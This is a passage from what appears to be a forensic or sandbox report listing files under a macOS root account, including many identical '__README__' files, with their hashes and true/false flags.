  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__1
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__10
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__11
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__12
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__13
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__14
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__15
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__16
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__17
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__18
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__19
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__2
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__20
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__21
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__22
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__23
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__24
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__25
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__26
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__27
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__28
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__29
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__3
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__30
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__31
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__32
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__33
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__34
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__35
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__36
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__37
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__38
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__39
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__4
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__40
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__41
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__42
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Desktop/__README__5
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__6
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__7
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__8
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
true
/private/var/root/Desktop/__README__9
  • Type: data
  • MD5: 27482CFC974CFAC632597DE0B7CE59F6
  • SHA: 59DF6B4A8826B749437B087E4B875B91EEEE7503
  • SHA-256: D529C40FD9A4670C8B3D094A9029C6B2AF25564CEACBA0AB54B9AB827E237000
  • SHA-512: AAB78931E6A8C36A23D5FA7534AE2796F08E015677238FAE557A11D169ED260297B460287250B18C25CD61DACF2CDEC98F2EDCC29E2D1A8BA7BB7385B8E3BC31
false
/private/var/root/Library/.FS_Store
  • Type: data
  • MD5: C263F1412ADBDE39CCCDCC36A35BA025
  • SHA: 9B8B3A9349DD03BC0295910C8B1A55CB7A3C8AD2
  • SHA-256: C77BA3FB52589BCCDAE2A1DD609900723C4598EE0ACBA12AF583E6277ACE5600
  • SHA-512: C73D98DD19F53C45C5411393A946C70AB0271AB9D1AE93F8ECCCC1EA5F26AE469AAE673B09771A75F0833B1C557FFCE543EC5C606DD400FF820A2F231A0EF5E0
true
/private/var/root/Library/Application Support/.Ex2hyOukeP
  • Type: data
  • MD5: 69A97AE6C78549F23F1618734BE5B7EA
  • SHA: 303F38490F80150CAD56D19FFB4512125A513030
  • SHA-256: 9B4A6D6E508028CAAFA8E51804B84B7C4B11053A04BA990F3CDDDA3B58DC8962
  • SHA-512: 4C78544C910C9469BE8CA0EA3734A904F8F294ACA2DC1D0D96993E58402FD1A540E3A7A8E1C3F0CB53ADEA0C8BC2D721B848CB01064F0217C719DEF595CB55D5
false
/private/var/root/Library/Application Support/Oracle/Java/Deployment/deployment.properties
  • Type: data
  • MD5: 27A2EEA82074CF6A09DF2FCAEFF97A10
  • SHA: 3D35C3580159EA5910C02CB4C627635EDDD49498
  • SHA-256: 82FD21667A47FB46D2A9EA7A531D484922BCB5860A406A805FF09A1C7BBE61AD
  • SHA-512: 6E4231F2959D30FAFF065491DE356C4649B9089B90FD01E4769144C055275CA4F739D5C8A53F0F1755C44BF4FD531943F64254CF27907161336008F7BA99BFC5
false
/private/var/root/Library/Application Support/Quick Look/cloudthumbnails.db
  • Type: data
  • MD5: 053C4D7437E3DB32D643DE637521831C
  • SHA: FC18C182C717DCD7A2BD9E5087486F42E7E012E9
  • SHA-256: 7A55E4A720D98BAF823365B19BEB7D4285848C35FEBAE4DE57B70870AA301E4A
  • SHA-512: 78E47DC312B929C52097C280A9A12D1994B2F0AD333473F2E8F3BB2A1F1FE7E2DC6B0D77CC6586482711CF7AE8566EA8FF41C925AEF13559F709D6ED5393D240
false
/private/var/root/Library/Application Support/Quick Look/cloudthumbnails.db-shm
  • Type: data
  • MD5: 561D14670DBC3CC9F590AB7B86EA3E9C
  • SHA: ACF8DF190F62F3823400CBA8924AFC1179B0EB68
  • SHA-256: 1E5120F7A45DFB78681CB014BEAB0D00C8740ED86F951177EDD1F8F50568CA90
  • SHA-512: 567A29F63BE98B89C9882A4F52FDDFF566849AA18DA0E64E5D78E523291090E88FD70B77FEE948C0E5FA4E2D6775DF09CADB65C6A513CE2C928FB1AFDD8B9801
false
/private/var/root/Library/Application Support/Quick Look/cloudthumbnails.db-wal
  • Type: data
  • MD5: 439FFBE5B6E23CD3969B976B969917E3
  • SHA: 148DD0825595422687D425544898BB7C130D7958
  • SHA-256: 5FA6A9779E74AB57F5B8DD0CEDD361A6CCBBB912514FFF8EA71CCF96C7008BB3
  • SHA-512: AC6B3C12EDCB9245EC651AD428F8192F032FE1A2708350ADF149323991A02CE1C5AE03137714A436C6678039C653587ECCDE0173B08989765C172EC8C8B9AE86
false
/private/var/root/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.apple.nbagent.sfl
  • Type: data
  • MD5: 76FF8DD1934EFB6B11693C5E75B589D4
  • SHA: B36D2563FBEB750CF0D6C25EBE9A913EAE44F55E
  • SHA-256: 77BCB15168C5114B2E921E2F488636AA8CC3343A26164BF539B4CADF143B4D3F
  • SHA-512: 41F05A5476E0418DC4B966AF544E68C68EBA92FFB883D4314154D7D02B51AF790248BA721A31244F2483C4E7FCDC7FDE1B85C372D1F3C0C73114A680F23EE8E0
false
/private/var/root/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.RecentDocuments.sfl
  • Type: data
  • MD5: 76FF8DD1934EFB6B11693C5E75B589D4
  • SHA: B36D2563FBEB750CF0D6C25EBE9A913EAE44F55E
  • SHA-256: 77BCB15168C5114B2E921E2F488636AA8CC3343A26164BF539B4CADF143B4D3F
  • SHA-512: 41F05A5476E0418DC4B966AF544E68C68EBA92FFB883D4314154D7D02B51AF790248BA721A31244F2483C4E7FCDC7FDE1B85C372D1F3C0C73114A680F23EE8E0
false
/private/var/root/Library/Caches/SubmitDiagInfo/Cache.db
  • Type: data
  • MD5: 3C182924DE61A8F7FC60A36988F330AD
  • SHA: 2ACE58A7A4A583DD0CF17446CC83DBF2B3EB046D
  • SHA-256: D496EFCD22F81F9448A4ACAB6E353B144A804A6ED91AB92D37682B6E17EB7D8C
  • SHA-512: BB9BCE6D13FBD53A5BD49AD1B2471D8012B43E0511DACBB01CF4AA5653B1D1FF0C9C16627B6BE7C13B011D54817A252E87FB743A0DD0953FAF98B9533B2E0CEB
false
/private/var/root/Library/Caches/SubmitDiagInfo/Cache.db-shm
  • Type: data
  • MD5: 5372CF81661B0CBE09B5E239044BB353
  • SHA: 1BF912019A599767369D514A1EC7F6ABA903CDF2
  • SHA-256: 4D7819CDC489F494681089596B97E8E86C6036C906EFE9DF165A5FC16557243C
  • SHA-512: FCC193E2B5653159E1C644489F5056055AAEB945382574AA44C3D40CC4F38F2372C097DB9D36052FA247436B7B0FF74061C6DA80742DDDD046BBF2A6B774D503
false
/private/var/root/Library/Caches/SubmitDiagInfo/Cache.db-wal
  • Type: data
  • MD5: BA10D306CCBE9485A2CFB79F455CBDCA
  • SHA: CF56077F979FD5D2439CA9D00F2B47303B81B003
  • SHA-256: 125AD4C9BF7C284DF757127F315CDC3AB4F554F767AFFC59DCF2DE30737FB3BA
  • SHA-512: C835828173FC06438F62E615C0C5BA8745ADDE39C7BB45BA05D940C6B2116A501549E69AD1651891AE69D920F212DF9567E71200F2663E2B5461AA47F12E9321
false
/private/var/root/Library/Caches/SubmitDiagInfo/fsCachedData/045B1460-DFCF-40DB-9860-02999009D638
  • Type: data
  • MD5: CDD249BDF4D7B5E5C7745CCD0EC50A32
  • SHA: 633249D708447BC354B9DA745A4A90DF382793AE
  • SHA-256: C02FE1A5B0CE4F16F58A5B0EBA43DB9E5A285C290808EA088D6BD3F2C55931F4
  • SHA-512: 0E53739637D78EDD6951B66AC7925D122F1DB29E4C971512A3C740BF2514BF0A7F337EAA1CB6AAE3E3069A9FCC0140F8F8FA22B04E1F140D52E63E6C229860B9
false
/private/var/root/Library/Caches/com.apple.SetupAssistant/Cache.db
  • Type: data
  • MD5: 3C182924DE61A8F7FC60A36988F330AD
  • SHA: 2ACE58A7A4A583DD0CF17446CC83DBF2B3EB046D
  • SHA-256: D496EFCD22F81F9448A4ACAB6E353B144A804A6ED91AB92D37682B6E17EB7D8C
  • SHA-512: BB9BCE6D13FBD53A5BD49AD1B2471D8012B43E0511DACBB01CF4AA5653B1D1FF0C9C16627B6BE7C13B011D54817A252E87FB743A0DD0953FAF98B9533B2E0CEB
false
/private/var/root/Library/Caches/com.apple.SetupAssistant/Cache.db-shm
  • Type: data
  • MD5: D0AD0518C51359D0EEB924C701CD9555
  • SHA: C5803296F0288D9B59843D32529F36F4578F6658
  • SHA-256: 35CF3F3976024D04208CF895FA4088D00E5D7675B4195BC5121F2B5510227E71
  • SHA-512: 922718877E62E978CF130C6E1E69DCAA9FA7B40C4B1A4C78AB26C002ADBCA5EFD941D36E16DC72FA96D04FB2D26D98F7CBD31D7D327C2B5B52C263ECD4B09880
false
/private/var/root/Library/Caches/com.apple.SetupAssistant/Cache.db-wal
  • Type: data
  • MD5: BA71C0C5AD4C8B69B9D953FAEC33D1D5
  • SHA: A1A39F60F6DD95C8947446B7707E54928B594885
  • SHA-256: 0223D63D24780452AA5093CFD132275FEF1AFD8C873EB172909EACFEBE527237
  • SHA-512: C281D80D57C02A6FA339477501D6F2F73F5E2FF6257D499C8E504E5015D2ED9EA48D960103D1773C6E2E45EDBB75E07BD12A6AF0935FA8487ABA2E45CB33F724
false
/private/var/root/Library/Caches/com.apple.aps.framework/Cache.db
  • Type: data
  • MD5: 3C182924DE61A8F7FC60A36988F330AD
  • SHA: 2ACE58A7A4A583DD0CF17446CC83DBF2B3EB046D
  • SHA-256: D496EFCD22F81F9448A4ACAB6E353B144A804A6ED91AB92D37682B6E17EB7D8C
  • SHA-512: BB9BCE6D13FBD53A5BD49AD1B2471D8012B43E0511DACBB01CF4AA5653B1D1FF0C9C16627B6BE7C13B011D54817A252E87FB743A0DD0953FAF98B9533B2E0CEB
false
/private/var/root/Library/Caches/com.apple.aps.framework/Cache.db-shm
  • Type: data
  • MD5: 2D6D332318B8933CCCEFC298C4EAF5BC
  • SHA: 11E636F78CF79CBD379D29D9373373AB986899F1
  • SHA-256: 10DB6439AF98DD1EE88BFF06E77657B04ED40F59C2BB751761322AD5EDDE0888
  • SHA-512: 7073F694464AF299E1E7C041BABBA22A57294BB3B1C6E5DDCF67D256A93030910242183DFCD66443BBD7C96CC542F8BF94A459FACD8AB9351A4FB0B6DDB0F84A
false
/private/var/root/Library/Caches/com.apple.aps.framework/Cache.db-wal
  • Type: data
  • MD5: AC99BDDC74D35661B052264BCA5E5B72
  • SHA: 3C4A2C93D0F77A6951F22E59913A1E3CB97B52E3
  • SHA-256: CC4933EF3B778674653A064ED293E291B3013E9248BAF87AEE13D74DC4970178
  • SHA-512: 65BF9A7B79E3BF5B2C349151C610459E65D5BAAE65105A62C369339220B5613189E6011DE7BF7944123DAE9A97986B3B3FB3CC0C28CD02FF2C994ADB86F5508B
false
/private/var/root/Library/Caches/com.apple.helpd/Cache.db
  • Type: data
  • MD5: 3C182924DE61A8F7FC60A36988F330AD
